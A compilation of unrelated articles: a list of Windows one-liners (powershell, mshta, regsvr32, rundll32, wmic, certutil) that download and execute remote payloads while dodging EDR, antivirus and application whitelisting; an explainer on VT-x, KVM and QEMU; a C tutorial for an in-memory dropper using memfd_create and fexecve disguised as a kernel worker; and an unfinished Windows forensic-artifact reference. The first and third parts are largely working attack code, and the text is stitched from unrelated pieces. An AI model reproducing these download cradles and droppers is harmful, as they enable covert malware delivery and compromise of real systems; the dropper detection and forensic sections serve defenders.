Windows oneliners to download remote payload and execute arbitrary code


In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ?

These command lines need to fulfill the following prerequisites:

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits, huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, will it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as many systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written to disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end up in a local cache.

When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

  1. either the command itself accepts an HTTP URL as one of its arguments
  2. the command accepts a UNC path (pointing to a WebDAV server)
  3. the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one of the following locations:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. If it’s not, it can be started even from a low privileged user account by simply prepending the command line with « pushd \\webdavserver & popd ».

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.


Powershell

Ok, this is by far the most famous one, but also probably the most monitored one, if not blocked. A well known proxy friendly command line is the following:

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon !)

Of course you could also use its encoded counterpart.

But you can also call the payload directly from a WebDAV server:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Cmd

Why make things complicated when you can have cmd.exe execute a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior’s work), and see that you can easily drop any binary, DLL or script:
So once you’ve been creative with your payload as a batch file, go for it:

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Cscript / Wscript

Also very common, but the idea here is to download the payload from a remote server in one command line:

cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Mshta

Mshta is really in the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

mshta http://webserver/payload.hta

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:

mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Rundll32

A well known one as well, which can be used in different ways. The first one is referring to a standard DLL using a UNC path:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe
Payload written on disk: IE local cache


Wmic

Discovered by @subTee with @mattifestation, wmic can invoke an XSL (eXtensible Stylesheet Language) local or remote file, which may contain some scripting of our choice:

wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe
Payload written on disk: IE local cache


Regasm / Regsvc

Regasm and Regsvcs are among those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (which can be written in .Net/C#) exposing the proper interfaces, and you can then call it over WebDAV:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe \\webdavserver\folder\payload.dll


Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Regsvr32

Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option:

regsvr32 /s /n /u /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

regsvr32 /s /n /u /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Odbcconf

This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. Note that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Msbuild

Let’s keep going with all these .Net framework utilities discovered by @subTee. You cannot use msbuild.exe with an inline task straight from a UNC path (actually you can, but it gets really messy), so I came up with the following trick, using msbuild.exe only. Note that it has to be called from a shell with delayed expansion enabled (cmd /V option):

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands

After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

certutil -urlcache -split -f http://webserver/payload payload

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

There are probably many other ways of achieving the same result, but these command lines do the job while fulfilling most of the prerequisites we set at the beginning of this post !

One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware.

Payloads source examples

All the command lines previously cited make use of specific payloads:

  • Various scriptlets (.sct), for mshta, rundll32 or regsvr32
  • XSL files for wmic
  • HTML Application (.hta)
  • MSBuild inline tasks (.xml or .csproj)
  • DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on GitHub, from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on GitHub.

You can also find some other examples on my gist.

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is the name of Intel’s CPU virtualisation technology. KVM is the component of the Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition of all aspects here, although in the future I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into the main discussion. Related to virtualisation is the concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has an ARM processor, but your host machine has an x86 processor, then QEMU or VMWare emulates or fakes the ARM processor. When we talk about virtualisation we mean hardware-assisted virtualisation, where the VM’s processor matches the host computer’s processor. Often conflated with virtualisation is the quite distinct concept of containerisation. Containerisation is mostly a software concept: it builds on top of operating system abstractions like process identifiers, file systems and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM setup looks like below:



At the lowest level is hardware which supports virtualisation. Above it sits the hypervisor, or virtual machine monitor (VMM). In the case of KVM, this is actually the Linux kernel with the KVM modules loaded into it. In other words, KVM is a set of kernel modules that, when loaded into the Linux kernel, turn the kernel into a hypervisor. Above the hypervisor, and in user space, sit the virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from the hypervisor.

Finally, there is the “full” vs. “para” virtualisation dichotomy. Full virtualisation is when the OS running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when the OS inside the VM is aware that it is being virtualised, and thus runs in a slightly modified way compared to how it would run on real hardware.


VT-x

VT-x is CPU virtualisation for the Intel 64 and IA-32 architectures. For Intel’s Itanium, there is VT-i. For I/O virtualisation there is VT-d. AMD also has its own virtualisation technology, called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to the real, protected, long, etc. modes, and also orthogonal to the privilege rings (0-3). They form a new “plane”, so to speak. The hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would in root mode, which means that a VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.


Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that the VMCS stores information at CPU-level granularity, not VM-level. To read and write a particular VMCS, the VMREAD and VMWRITE instructions are used. They effectively require root mode, so only the hypervisor can modify a VMCS. A non-root VM can perform VMWRITE, but against a “shadow” VMCS rather than the actual one – something that doesn’t concern us immediately.

There are also instructions that operate on a whole VMCS instance rather than individual fields. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory location. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL 0, so they can only be executed from inside the Linux kernel (or another OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.


KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that, when loaded, turn the Linux kernel into a hypervisor. Linux continues its normal operations as an OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: the core module and machine-specific modules. kvm.ko is the core module and is always needed. Depending on the host machine’s CPU, a machine-specific module like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in the VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCSs, deals with VM exits, etc. Let’s also mention that AMD’s virtualisation technology AMD-V has its own instructions, called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`, containing the code which deals with the virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls to this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is the lowest-granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see the QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating a vCPU, QEMU continues interacting with it using these ioctls and the memory mapped pages.


QEMU

Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with an ARM or MIPS core on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with the Tiny Code Generator (TCG). This can be thought of as a sort of high-level-language VM, like the JVM. It takes, for instance, MIPS code, converts it to an intermediate bytecode, which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As a virtualiser it gets help from KVM. It talks to KVM using ioctls as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates the impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O, which is something that KVM may not fully support – take the example of a VM with a particular serial port on a host that doesn’t have one. Now, when software inside the VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with a pointer to information about the I/O request. QEMU emulates the I/O device for that request – thus fulfilling it for the software inside the VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:


Super-Stealthy Droppers


Some weeks ago I found this interesting article about injecting code into running processes without using ptrace. The article is very interesting and I recommend you to read it, but what caught my attention was a brief sentence towards the end. Actually this one:

The current payload in use is a simple memfd_create + fexecve stager.

I had never heard before about memfd_create or fexecve… that’s why this sentence caught my attention.

In this paper we are going to talk about how to use these functions to develop a super-stealthy dropper. You could consider it a malware development tutorial… but you know that it is illegal to develop and also to deploy malware. This means that this paper is for educational purposes only… because, after all, a malware analyst needs to know how malware developers do their stuff in order to identify it, neutralise it and do what is needed to keep systems safe.




So, after reading that intriguing sentence, I googled those two functions and saw they were pretty cool. The first one, memfd_create, is actually pretty awesome: it allows us to create a file in memory. We quickly talked about this in a previous paper (Running binaries without leaving tracks), but there we were just using /dev/shm to store our file. That folder is actually stored in memory, so whatever we write there does not end up on the hard drive (unless we run out of memory and start swapping). However, the file was visible with a simple ls. memfd_create does the same, but the memory disk it uses is not mapped into the file system, and therefore you cannot find the file with a simple ls. 😮

The second one, fexecve, is also pretty awesome. It allows us to execute a program (in exactly the same way that execve does), but we reference the program to run using a file descriptor instead of its full path. And this one matches perfectly with memfd_create.
But there is a caveat with these function calls: they are relatively new. memfd_create was introduced in kernel 3.17, and fexecve is a libc function available since glibc 2.3.2. While fexecve can be easily implemented when not available (we will see that in a sec), memfd_create is just not there on old kernels…

What does this mean? It means that, at least nowadays, the technique we are going to describe will not work on embedded devices that usually run old kernels and have stripped-down versions of libc. Although I haven’t checked the availability of these functions on, for instance, some routers or Android phones, I believe it is very likely that they are not available. If anybody knows, please drop a line in the comments.

A simple dropper

In order to figure out how these two little guys work, I wrote a simple dropper. Well, it is actually a program able to download some binary from a remote server and run it directly in memory, without dropping it on the disk.

Before continuing, let’s check the Hajime case we described towards the end of a previous post (IoT Malware Droppers (Mirai and Hajime)). There you will find a cryptic shell line that basically creates a file with execution permissions and drops into it another file which is downloaded from the net. Then the downloaded program gets executed and deleted from the disk. In case you don’t want to open the link again, this is the line I’m talking about:

cp .s .i; >.i; ./.s>.i; ./.i; rm .s; /bin/busybox ECCHI

We are going to write a program that, once executed, will do exactly the same as the cryptic shell line above.

Let’s first take a look at the code and then we can comment on it.

The code

This is the code:

#include <stdio.h>
#include <stdlib.h>

#include <sys/syscall.h>

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define __NR_memfd_create 319   /* x86_64 syscall number */
#define MFD_CLOEXEC 1

/* No libc wrapper for memfd_create, so we roll our own. */
static inline int memfd_create(const char *name, unsigned int flags) {
    return syscall(__NR_memfd_create, name, flags);
}

extern char        **environ;

int main (int argc, char **argv) {
  int                fd, s, n;
  /* AF_INET + port 0x1111 + 127.0.0.1 packed into one 64-bit constant */
  unsigned long      addr = 0x0100007f11110002;
  char               *args[2]= {"[kworker/u!0]", NULL};
  char               buf[1024];

  // Connect
  if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) exit (1);
  if (connect (s, (struct sockaddr*)&addr, 16) < 0) exit (1);
  if ((fd = memfd_create ("a", MFD_CLOEXEC)) < 0) exit (1);

  // Download the payload into the in-memory file
  while (1) {
      if ((n = read (s, buf, 1024)) <= 0) break;
      write (fd, buf, n);
  }
  close (s);

  // Execute the in-memory file
  if (fexecve (fd, args, environ) < 0) exit (1);

  return 0;
}
It is pretty short and simple, isn’t it? But there are a couple of things we have to say about it.



The first thing we have to comment on is that there is no libc wrapper for the memfd_create system call. You will find this information in the memfd_create manpage’s NOTES section. That means we have to write our own wrapper.

First, we need to figure out the syscall number for memfd_create. Just use any on-line syscall list. Remember that the numbers change with the architecture, so if you plan to use the code on an ARM or a MIPS machine, you may need to use a different number. The number we used (319) is the one for x86_64.
You can see the wrapper at the very beginning of the code (just after the #include directives), using the syscall libc function.

Then, the program just does the following:

  • Create a normal TCP socket
  • Connect to port 0x1111 on 127.0.0.1 using family AF_INET… We have packed all this information in a single unsigned long variable to make the code shorter… but you can easily modify this information taking into account that:

    addr = 01 00 00 7f  1111   0002;
           127.0.0.1  | Port | Family

Of course this is not standard, and whenever the layout of struct sockaddr_in changes the code will break down… but it was cool to write it like this :stuck_out_tongue:

  • Create a memory file
  • Read data from the socket and write it into the memory file
  • Run the memory file once all the data has been transferred.

That’s it… very simple and straightforward.


So, now it is time to test it. According to the long constant in the main function, the dropper will connect to port 0x1111 on localhost (127.0.0.1). So we will improvise a file server with netcat.
In one console we just run this command:

$ cat /usr/bin/xeyes | nc -l $((<span class="hljs-number">0x1111</span>))

You can choose whatever binary you prefer. I like those little eyes following my mouse pointer all over the place.

Then in another console we run the dropper, and those funny eyes should pop up on your screen. Let’s see which tracks we can find after running the remote code.

Detecting the dropper

Spotting the process is difficult because we have given it a kernel-worker-like name (kworker/u!0). Note the ! character, which is just there to allow me to quickly identify the process for debugging purposes. In reality, you would use a : instead, so the process looks exactly like one of those kernel workers. But let’s look at the ps output:
$ ps axe
 2126 ?        S      0:00 [kworker/0:0]
 2214 pts/0    S+     0:00 [kworker/u!0]

You can see the output for a legit kworker process in the first line, and then you find our dodgy program in the second line… which is associated with a pseudo-terminal!!! I think this can be easily avoided… but I will leave this to you, to sharpen your UNIX development skills :wink:

However, even if you detach the process from the pseudo-terminal…

Invisible file

We mentioned that memfd_create creates a file in a RAM filesystem that is not mapped into the normal filesystem tree… at least, if it is mapped, I couldn’t find where. So far this looks like a pretty stealthy way to drop a file!!

However, let’s face it, if there is a file somewhere, there should be a way to find it… shouldn’t there? Of course there is. But when you are in this kind of trouble… who you gonna call?.. Sure… Ghostbusters! And you know what? For GNU/Linux systems, the way to bust ghosts is using lsof:
$ lsof | grep memfd
3         2214            pico  txt       REG                0,5    19928      28860 /memfd:a (deleted)

So, we can easily find any memfd file in the system using lsof. Note that lsof will also indicate the associated PID, so we can also easily pinpoint the dropper process even when it is using some name camouflage and is not associated with a pseudo-terminal!!!

What if memfd_create is not available?

We have mentioned that memfd_create is only available on kernels 3.17 or higher. What can be done for other kernels? In this case we will be a bit less stealthy, but we can still do pretty well.

Our best option in this case is to use shm_open (SHared Memory Open). This function basically creates a file under /dev/shm… this one will be visible with a simple ls, but at least we avoid writing to the disk. The only difference between using shm_open and plain open is that shm_open creates the files directly under /dev/shm, while with open we have to provide the whole path.

To modify the dropper to use shm_open we have to do two things.

First, we have to substitute the memfd_create call with a shm_open call like this:

<span class="hljs-keyword">if</span> ((fd = shm_open(<span class="hljs-string">"a"</span>, O_RDWR | O_CREAT, S_IRWXU)) &lt; 0) <span class="hljs-built_in">exit</span> (1);

The second thing is that we need to close the file and re-open it read-only in order to be able to execute it with fexecve. So, after the while loop that populates the file, we have to close and re-open it:

  <span class="hljs-keyword">close</span> (fd);

  <span class="hljs-keyword">if</span> ((fd = shm_open(<span class="hljs-string">"a"</span>, O_RDONLY, <span class="hljs-number">0</span>)) &lt; <span class="hljs-number">0</span>) <span class="hljs-keyword">exit</span> (<span class="hljs-number">1</span>);

However, note that now it does not make much sense to use fexecve; we can skip reopening the file read-only and just call execve on the file created under /dev/shm, which is effectively the same and is also shorter.

… and what if fexecve is not available?

This one is pretty easy, once you get to know how fexecve works. How can you figure out how the function works? Just google for its source code!!! A hint is provided in the man page, though:

On Linux, fexecve() is implemented using the proc(5) file system, so /proc needs to be mounted and available at the time of the call.

So, what it does is to just use execve, providing as the file path the file descriptor entry under /proc. Let’s elaborate on this a bit more. You know that each open file is identified by an integer, and you also know that each process in your GNU/Linux system exports all its related information under the /proc pseudo filesystem in a folder named after its PID (supposing the proc filesystem is mounted). Well, inside that folder you will find another folder named fd, containing a file per file descriptor opened by the process. Each file is named after its actual file descriptor, that is, the integer number.

Knowing all this, we can run a file identified by a file descriptor just by passing the path to the right file under /proc/PID/fd. A basic implementation of fexecve will look like this:

<span class="hljs-function"><span class="hljs-keyword">int</span>
<span class="hljs-title">my_fexecve</span> <span class="hljs-params">(<span class="hljs-keyword">int</span> fd, <span class="hljs-keyword">char</span> **arg, <span class="hljs-keyword">char</span> **env)</span> </span>{
  <span class="hljs-keyword">char</span>  fname[<span class="hljs-number">1024</span>];

  <span class="hljs-built_in">snprintf</span> (fname, <span class="hljs-number">1024</span>, <span class="hljs-string">"/proc/%d/fd/%d"</span>, getpid(), fd);
  execve (fname, arg, env);
  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}

This implementation of fexecve is completely equivalent to the standard one… well, it is missing some sanity checks but, after all, we’re living on the edge :P.

As mentioned before, this is very convenient to use together with memfd_create, which returns a file descriptor and does not require the close and re-open sequence. Otherwise, when there is a file somewhere, even in memory, it is even faster to just use execve, as you can infer from the implementation above.


Well, this is it. Hope you have found this interesting. It was interesting for me. Now, after having read this paper, you should be able to figure out what the open/memfd_create/sendfile/fexecve sequence we mentioned at the beginning means…

We have also seen a quite stealthy technique to drop files on a remote system. And we have also learned how to detect the dropper, even when it may look invisible at first glance.

You can download all the code from: 0x00pf/0x00sec_code

Available Artifacts — Evidence of Execution

The main focus of this post, and particularly the associated table of artifacts, is to serve as a reference and reminder of what evidence sources may be available on a particular system during analysis.

On to the main event. The table below details some of the artifacts which evidence program execution and whether they are available for different versions of the Windows Operating System.


Cells in Green indicate that the artifact is available by default; note that some artifacts may still be absent despite a Green cell (e.g. instances where Prefetch is disabled due to an SSD).

Cells in Yellow indicate that the artifact is associated with a feature that is disabled by default but may be enabled by an administrator (e.g. Prefetch on a Windows Server OS) or added through the application of a patch or update (e.g. the introduction of BAM to Windows 10 in 1709+ or the back-porting of Amcache to Windows 7 in the optional update KB2952664+).

Cells in Red indicate that the artifact is not available in that version of the OS.

Cells in Grey (containing «TBC») indicate that I’m not 100% sure at the time of writing whether the artifact is present in a particular OS version, that I have more work to do, and that it would be great if you could let me know if you already know the answer!

It is my hope that this table will be helpful to others. It will be updated, and certainly at this stage it may contain errors, as I am reliant upon research and memory of artifacts without having had the opportunity to double-check each entry through testing. Feedback, both in the form of suggested additions and any required corrections, is very much appreciated and encouraged.

Summary of Artifacts

What follows below is brief details on the availability of these artifacts, some useful resources for additional information and tools for parsing them. It is not my intention to go into detail as to the functioning of the artifacts as this is generally already well covered within the references.


Prefetch

Prefetch has historically been the go-to indication of process execution. If enabled, it can provide a wealth of useful data in an investigation or incident response. However, since Windows 7, systems with an SSD installed as the OS volume have had Prefetch disabled by default during installation. With that said, I have seen plenty of systems with SSDs which still had Prefetch enabled (particularly in businesses which push a standard image), so it is always worth checking for. Windows Server installations also have Prefetch disabled by default, and the same applies.

The following registry key can be used to determine if it is enabled:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
0 = Disabled
1 = Only Application launch prefetching enabled
2 = Only Boot prefetching enabled
3 = Both Application launch and Boot prefetching enabled



ShimCache

It should be noted that the presence of an entry for an executable within the ShimCache doesn’t always mean it was executed, as merely navigating to it can cause it to be listed. Additionally, Windows XP ShimCache is limited to 96 entries; all versions since then retain up to 1024 entries.

ShimCache has one further notable drawback. The information is retained in memory and is only written to the registry when the system is shut down. Data can be retrieved from a memory image if available.



MUICache

Programs executed via Explorer result in MUICache entries being created within the NTUSER.DAT of the user responsible.


Amcache / RecentFileCache.bcf

Amcache.hve within Windows 8+ and RecentFileCache.bcf within Windows 7 are two distinct artifacts used by the same mechanism in Windows to track application compatibility issues with different executables. As such, they can be used to determine when executables were first run.


Microsoft-Windows-TaskScheduler (200/201)

The Microsoft-Windows-TaskScheduler log file (specifically events 200 and 201) can evidence the starting and stopping of an executable which is being run as a scheduled task.


LEGACY_* Registry Keys

Applicable to Windows XP/Server 2003 only, this artifact is located in the SYSTEM registry hive; these keys can evidence the running of executables which are installed as a service.


Microsoft-Windows-Application-Experience Program-Inventory / Telemetry

Both of these system logs are related to the Application Experience and Compatibility features implemented in modern versions of Windows.

At the time of testing, none of my desktop systems have the Inventory log populated, while the Telemetry log seems to contain useful information. I have, however, seen various discussions online indicating that the Inventory log is populated in Windows 10. It is likely that my disabling of all tracking and reporting functions on my personal systems and VMs is the cause… more testing required.


Background Activity Monitor (BAM)

The Background Activity Monitor (BAM) and Desktop Activity Moderator (DAM) registry keys are located within the SYSTEM registry hive; because entries are recorded under the SID of the associated user, the artifact is user attributable. The keys detail the path of executable files that have been executed and the last execution date/time.

It was introduced to Windows 10 in 1709 (Fall Creators update).


System Resource Usage Monitor (SRUM)

Introduced in Windows 8, this Windows feature maintains a record of all sorts of interesting information concerning applications and can be used to determine when applications were running.



Timeline

In the Windows 10 1803 (April 2018) update, Microsoft introduced the Timeline feature, and all forensicators did rejoice. This artifact is a goldmine for user activity analysis, and the associated data is stored within an ActivitiesCache.db located within each user’s profile.


Security Log (592/4688)

Event IDs 592 (Windows XP/2003) and 4688 (everything since) are recorded within the Security log on process creation, but only if Audit Process Creation is enabled.


System Log (7035)

Event ID 7035 within the System event log is recorded by the Service Control Manager when a Service starts or stops. As such it can be an indication of execution if the associated process is registered as a service.



UserAssist

Within each user’s NTUSER.DAT, the UserAssist key tracks execution of GUI applications.



RecentApps

The RecentApps key is located in the NTUSER.DAT associated with each user and contains a record of their… Recent Applications. The presence of keys associated with a particular executable evidences the fact that this user ran the executable.



Jumplists

Implemented in Windows 7, Jumplists are a mechanism by which Windows records and presents recent documents and applications to users. Located within individual user profiles, the presence of references to executables within ‘Recent\AutomaticDestinations’ can be used to evidence the fact that they were run by the user.



RunMRU

